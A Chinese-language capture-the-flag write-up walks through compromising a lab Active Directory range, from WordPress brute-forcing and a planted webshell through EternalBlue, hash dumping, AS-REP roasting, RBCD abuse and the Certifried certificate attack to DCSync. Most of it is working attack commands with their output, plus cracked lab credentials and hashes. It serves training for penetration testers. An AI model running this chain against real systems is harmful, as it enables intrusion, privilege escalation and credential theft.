2022网鼎杯半决赛复盘

2022网鼎杯半决赛复盘

wordpress

直接访问80端口是个wordpress站点，扫描端口也只有80和22端口

用wpscan扫看看

sudo wpscan --url http://39.98.109.191/

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://39.98.109.191/ [39.98.109.191]
[+] Started: Sat Apr 13 12:42:40 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://39.98.109.191/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://39.98.109.191/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://39.98.109.191/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://39.98.109.191/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.5 identified (Outdated, released on 2024-04-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://39.98.109.191/index.php/feed/, <generator>https://wordpress.org/?v=6.2.5</generator>
 |  - http://39.98.109.191/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.2.5</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://39.98.109.191/wp-content/themes/twentytwentyone/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://39.98.109.191/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://39.98.109.191/wp-content/themes/twentytwentyone/style.css?ver=1.8
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://39.98.109.191/wp-content/themes/twentytwentyone/style.css?ver=1.8, Match: 'Version: 1.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <================================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Apr 13 12:42:46 2024
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 45.714 KB
[+] Data Received: 21.474 MB
[+] Memory used: 270.77 MB
[+] Elapsed time: 00:00:06

没测出来什么插件

sudo wpscan --url http://39.98.109.191/ --enumerate u

测出用户名是admin，尝试爆破密码

sudo wpscan --url http://39.98.109.191/ --enumerate u --passwords ./pass1000.txt

好吧，原来就是123456

有个Theme File Editor 可以写webshell，插入一句话木马，然后点下面的Update File就可以了

/wp-content/themes/twentytwentyone/404.php

蚁剑连接上

根目录下的flag，普通权限就可读

存在内网ip172.22.15.26

内网信息收集&搭建代理

传frp和fscan

./fscan_amd64 -h 172.22.15.26/24

172.22.15.24:3306 open
172.22.15.35:445 open
172.22.15.24:445 open
172.22.15.18:445 open
172.22.15.13:445 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.18:139 open
172.22.15.13:139 open
172.22.15.35:135 open
172.22.15.13:135 open
172.22.15.24:135 open
172.22.15.18:135 open
172.22.15.18:80 open
172.22.15.24:80 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.13:88 open
[+] 172.22.15.24    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo:
[*]172.22.15.35
   [->]XR-0687
   [->]172.22.15.35
[*] NetInfo:
[*]172.22.15.13
   [->]XR-DC01
   [->]172.22.15.13
[*] NetInfo:
[*]172.22.15.24
   [->]XR-WIN08
   [->]172.22.15.24
[*] NetInfo:
[*]172.22.15.18
   [->]XR-CA
   [->]172.22.15.18
[*] NetBios: 172.22.15.35    XIAORANG\XR-0687               
[*] NetBios: 172.22.15.13    [+]DC XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393 
[*] 172.22.15.13  (Windows Server 2016 Standard 14393)
[*] NetBios: 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] NetBios: 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.22.15.26       code:200 len:39962  title:XIAORANG.LAB
[*] WebTitle: http://172.22.15.18       code:200 len:703    title:IIS Windows Server
[*] WebTitle: http://172.22.15.24       code:302 len:0      title:None 跳转url: http://172.22.15.24/www
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle: http://172.22.15.24/www/sys/index.php code:200 len:135    title:None

代理

./frps -c ./frps.toml     // vps
./frpc -c ./frpc.toml &    // 受害机

分析一下

[+] 172.22.15.24    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
有个现成的永恒之蓝

172.22.15.24    永恒之蓝
172.22.15.26    已拿下
172.22.15.13    DC XR-DC01.xiaorang.lab
172.22.15.35

MS17-010

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
exploit

shell net user hey qwer1234! /add
shell net localgroup administrators hey /add

执行shell命令总是超时，先dump哈希吧

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

再用impacket连，也算一种曲线救国吧

proxychains4 python3 psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk

添加用户然后rdp

net user hey qwer1234! /add
net localgroup administrators hey /add

关闭防火墙

NetSh Advfirewall set allprofiles state off

报错了，参考远程连接服务器时出现“这可能是由于CredSSP加密数据库修正”的错误提示的解决办法-CSDN博客

有个phpstudy，可以看到数据库账号密码

zdoo OA

http://172.22.15.24/www/sys/index.php

账号密码admin/123456

都已经拿shell了，感觉没啥好看的了，看一下数据库吧

小皮面板点击备份，然后将备份文件传出来，导入自己的数据库查看

zdoosys_user表中有一堆邮箱，看起来像是域账户的格式

lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab

保存为2.txt

AS-REP Roasting

用刚才得到了邮箱当用户名跑看看AS-REP Roasting

proxychains4 python3 GetNPUsers.py -dc-ip 172.22.15.13 -usersfile 2.txt xiaorang.lab/

跑出来两个

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:d1bc040cd02e29f12f5eb6eb604444ef$f5d26ce37f8c847f826d5df31d923dfed1b253323986f1c8dad086c55c2d2bf2f4c2e1ff38160a40778e60a811944def86ceb1b7df257526242317e609606b468a577036759b44e54b04bb72f56afd18e64f243d5fab11d3062a6b914832afbad1667f85940687151d23a7c8fe3f03bccf659cf8930bf272ba2b51d28688af05e766a8bb99512d083102b01d1de436a0bd987f0fc252820777953dce5c6348cf8e967d72f3315eceec26997cce4784615d61464d69773e3545f86593ebe47d83880f75857a07f4ff47cdafaf98596cb62f2444bdf3bca544b49b697a8d1f3deb4cb28c9074db74d1fcacc986

$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:d68d94caf3438f11cc299118acd4a584$373ae9033e6035db3bd252e2c04ef265aaf1628e62b3dc40828302994532ef04e37f4c194f5c08fb5a8d36705552eadeca4e6729ed4082fbb3f3e48ebcfb68f3f4c8b1dcf659eb095637acf13402859adcd5c88079ce49101de8462f7ffb02927fdd072d8ce095cdcd8a9a6baf5e7c8442cf5615790a2c138e394d706782f3423ed0dfb57777862ead0a580f505cf12c37b571032c397ab5680dc5797e8de1bcef48857db120f97384f2d64b9662942a75ca6cdbb4df58ef04fa3562df4147ed689e52ba64fb0a3687ab4cc7a39a279825019457ba2abab09acb31f13b652fe37324f88c9ee1aad16d86636c

hashcat开爆

hashcat -m 18200 1.txt -a 0 ./rockyou.txt  --force

huachunmei@xiaorang.lab/1qaz2wsx
lixiuying@xiaorang.lab/winniethepooh

喷砂看看

proxychains4 -q crackmapexec smb 172.22.15.0/24 -u 'huachunmei@xiaorang.lab' -p '1qaz2wsx'

proxychains4 -q crackmapexec smb 172.22.15.0/24 -u 'lixiuying@xiaorang.lab' -p 'winniethepooh'

好吧，后面不加@xiaorang.lab才能跑出来，可能它自己帮忙加上了，rdp的时候还是需要加上域名的

rdp不上dc，试试172.22.15.35

可以成功连接上

Resource-Based Constrained Delegation

基于资源的约束委派（Resource-Based Constrained Delegation，RBCD）是在Windows Server 2012中新引入的功能。与传统的约束委派相比，它将设置委派的权限交还给了服务资源自身，也就是说服务自己可以决定“谁可以对我进行委派。”

基于资源的约束委派的关键在于msDS-AllowedToActOnBehalfOfOtherIdentity属性的设置。

bloodhound分析一下域内关系

proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

发现lixiuying用户对本地机器账户XR-0687具有GenericWrite权限，可以利用基于资源的约束委派

查询lixiuying对当前机器的DACL验证一下

Import-Module .\PowerView.ps1
Get-DomainUser -Identity lixiuying -Properties objectsid
Get-DomainObjectAcl -Identity XR-0687 | ?{$_.SecurityIdentifier -match "S-1-5-21-3745972894-1678056601-2622918667-1131"}

通过用户lixiuying在域内添加一个计算机账号Test1$，密码Test1234。

# 导入模块
Import-Module .\Powermad.ps1
# 设置机器账户的密码
$Password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force
# 通过Net-MachineAccount函数创建机器账户
New-MachineAccount -MachineAccount "Test1" -Password $($Password) -Domain "xiaorang.lab" -DomainController "XR-DC01.xiaorang.lab" -verbose

或者

impacket-addcomputer -method SAMR xiaorang.lab/lixiuying:winniethepooh -computer-name Test1\$ -computer-pass Test1234 -dc-ip 172.22.15.13

查看机器id

// 前面导入过的不需要再次导入
Import-Module .\PowerView.ps1
Get-NetComputer Test1 -Properties objectsid

S-1-5-21-3745972894-1678056601-2622918667-1147

修改服务资源msDS-AllowedToActOnBehalfOfOtherIdentity属性

# 尝试配置Test1到XR-0687的基于资源的约束性委派
$A = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1147)"
$SDBytes = New-Object byte[] ($A.BinaryLength)
$A.GetBinaryForm($SDBytes, 0)
Get-DomainComputer XR-0687 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose
# 查看是否配置成功
Get-DomainComputer XR-0687 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

利用 getST.py获取拥有访问XR-0687机器上的CIFS服务(文件共享服务器)的高权限票据。

proxychains4 impacket-getST xiaorang.lab/Test1\$:Test1234 -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator

改hosts

sudo vim /etc/hosts

然后导入票据

export KRB5CCNAME=Administrator.ccache

无密码连接就可以了

proxychains4 impacket-wmiexec -k xiaorang.lab/Administrator@XR-0687.xiaorang.lab -no-pass

或者

proxychains4 python3 psexec.py Administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

type C:\Users\Administrator\flag\flag03.txt

Certifried (CVE-2022–26923)

最后打dc就是用前面fscan扫到的cve去攻击的

[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect 

经过身份验证的用户可以操纵他们拥有或管理的计算机帐户的属性，并从 Active Directory 证书服务获取允许提升权限的证书。

从本质上讲，该漏洞允许普通域用户在通过 Active Directory 证书服务 (AD CS) 服务器将权限提升到域管理员。

通过certipy-ad创建一个机器账号Test2，并且设置DNS Host Name为域控的 XR-DC01.xiaorang.lab。

proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'

用该机器账户向 XR-CA请求证书

proxychains4 certipy-ad req -u 'Test2$@xiaorang.lab' -p 'Test1234' -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine

这里会遇到 KDC_ERR_PADATA_TYPE_NOSUPP错误，显示 KDC 不支持 PADATA 类型（预认证数据）, Kerberos 预身份验证失败。

proxychains4 certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13

whoami解决方案:https://whoamianony.top/posts/pass-the-certificate-when-pkinit-is-nosupp/

• 常规打法（刚才不报错的情况下）

通过颁发的证书对KDC进行PKINIT Kerberos身份验证，并获取域控制器账户的TGT票据。

proxychains4 certipy-ad auth -pfx xr-dc-01.pfx -username XR-DC01\$ -domain xiaorang.lab -dc-ip xr-dc01.xiaorang.lab

由于域控制器账户默认对域对象用于DS-Replication-Get-Changes和DS-Replication-Get-Change-All扩展权限，因此可以通过DCSync转储所有域哈希。

export KRB5CCNAME=xr.dc01.ccache

proxychains4 python3 secretsdump.py -k xiaorang.lab/xr-dc01\$@xr-dc01.xiaorang.lab -no-pass -just-dc

pth

proxychains4 impacket-wmiexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -hashes :26b321bde63de24097cd6610547e858b

• 报错情况下的可以 尝试Schannel，或者尝试whoami博客中的打法

这里通过 Schannel将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD / DCSync), 来获得域控权限

转换请求到的证书格式

openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt

让输入密码，直接回车就行

地址：https://github.com/AlmondOffSec/PassTheCert/

proxychains4 python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13

将证书配置到域控的 RBCD

proxychains4 python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'Test2$'

然后就是申请ST

proxychains4 getST.py xiaorang.lab/'Test2$':'Test1234' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

导入票据

export KRB5CCNAME=Administrator.ccache

再改host

sudo vim /etc/hosts

然后无密码连接就行了

proxychains4 python3 psexec.py Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13